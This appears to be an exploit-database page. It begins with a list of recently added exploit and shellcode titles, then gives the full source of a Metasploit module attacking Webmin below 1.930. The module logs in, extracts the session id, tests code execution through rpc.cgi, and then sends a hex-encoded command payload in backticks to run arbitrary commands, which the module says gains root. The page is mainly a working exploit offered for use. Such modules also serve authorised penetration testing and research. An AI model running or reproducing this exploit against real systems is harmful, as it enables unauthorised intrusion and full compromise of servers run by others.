
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
170 lines
No EOL
4.9 KiB
Ruby
Executable file
170 lines
No EOL
4.9 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "Webmin < 1.930 Remote Code Execution",
|
|
'Description' => %q{
|
|
This exploit takes advantage of a code execution issue within the function
|
|
unserialise_variable() located in web-lib-funcs.pl, in order to gain root.
|
|
The only prerequisite is a valid session id.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'James Bercegay', # Vulnerability Discovery
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'https://www.gulftech.org/' ]
|
|
],
|
|
'Privileged' => false,
|
|
'Payload' =>
|
|
{
|
|
'DisableNops' => true
|
|
},
|
|
'Platform' => ['unix'],
|
|
'Arch' => ARCH_CMD,
|
|
'Targets' => [ ['Automatic', {}] ],
|
|
'DisclosureDate' => '2019/08/30',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('WMPORT', [ true, "Webmin port", '10000']),
|
|
OptString.new('WMUSER', [ true, "Webmin username", 'test']),
|
|
OptString.new('WMPASS', [ true, "Webmin password", 'test']),
|
|
])
|
|
end
|
|
|
|
def check
|
|
|
|
# Set Webmin port
|
|
datastore['RPORT'] = datastore['WMPORT']
|
|
|
|
# Verbose
|
|
print_status("Attempting to login")
|
|
|
|
# Send login request
|
|
res = send_request_cgi(
|
|
{
|
|
'uri' => '/session_login.cgi',
|
|
'method' => 'POST',
|
|
'vars_post' =>
|
|
{
|
|
'user' => datastore['WMUSER'],
|
|
'pass' => datastore['WMPASS'],
|
|
'save' => '1'
|
|
},
|
|
'cookie' => "redirect=1; testing=1; sessiontest=1;"
|
|
})
|
|
|
|
# If succesful cookie will be set
|
|
if ( res and res.headers['Set-Cookie'] )
|
|
# Do we have a valid SID?
|
|
if ( /sid=/.match(res.headers['Set-Cookie']) )
|
|
# Extract the SID
|
|
sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
|
|
print_good("Login was successful")
|
|
else
|
|
# No dice
|
|
print_bad("Unable to login")
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
else
|
|
# No dice
|
|
print_bad("Unexpected response")
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
|
|
# Verbose
|
|
print_status("Checking if host is vulnerable")
|
|
|
|
# Try to execute arbitrary code
|
|
res = send_request_cgi({
|
|
'uri' => '/rpc.cgi',
|
|
'method' => 'POST',
|
|
'headers' =>
|
|
{
|
|
'Referer' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
|
|
},
|
|
'data' => 'OBJECT CGI;print "Content-Type: text/metasploit\n\n"',
|
|
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
|
|
})
|
|
|
|
# If it works our custom Content-Type will be set
|
|
if ( res.headers['Content-Type'] and res.headers['Content-Type'] == "text/metasploit" )
|
|
# Good
|
|
return Exploit::CheckCode::Vulnerable
|
|
else
|
|
# Bad
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
|
|
def exploit
|
|
|
|
# Set Webmin port
|
|
datastore['RPORT'] = datastore['WMPORT']
|
|
|
|
# Verbose
|
|
print_status("Attempting to login")
|
|
|
|
# Send login request
|
|
res = send_request_cgi(
|
|
{
|
|
'uri' => '/session_login.cgi',
|
|
'method' => 'POST',
|
|
'vars_post' =>
|
|
{
|
|
'user' => datastore['WMUSER'],
|
|
'pass' => datastore['WMPASS'],
|
|
'save' => '1'
|
|
},
|
|
'cookie' => "redirect=1; testing=1; sessiontest=1;"
|
|
})
|
|
|
|
# If succesful cookie will be set
|
|
if ( res and res.headers['Set-Cookie'] )
|
|
# Do we have a valid SID?
|
|
if ( /sid=/.match(res.headers['Set-Cookie']) )
|
|
# Extract the SID
|
|
sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
|
|
print_good("Login was successful")
|
|
else
|
|
# No dice
|
|
print_bad("Unable to login")
|
|
return
|
|
end
|
|
else
|
|
# No dice
|
|
print_bad("Unexpected response")
|
|
return
|
|
end
|
|
|
|
# Verbose
|
|
print_status("Sending selected payload")
|
|
|
|
# Hex encode payload to prevent problems with the payload getting mangled
|
|
hex = '\x' + payload.encoded.scan(/./).map{ |x| x.unpack('H*') }.join('\x')
|
|
|
|
# Send selected payload
|
|
res = send_request_cgi({
|
|
'uri' => '/rpc.cgi',
|
|
'method' => 'POST',
|
|
'headers' =>
|
|
{
|
|
'Referer' => 'https://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
|
|
},
|
|
'data' => 'OBJECT CGI;`' + hex + '`',
|
|
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
|
|
})
|
|
end
|
|
end |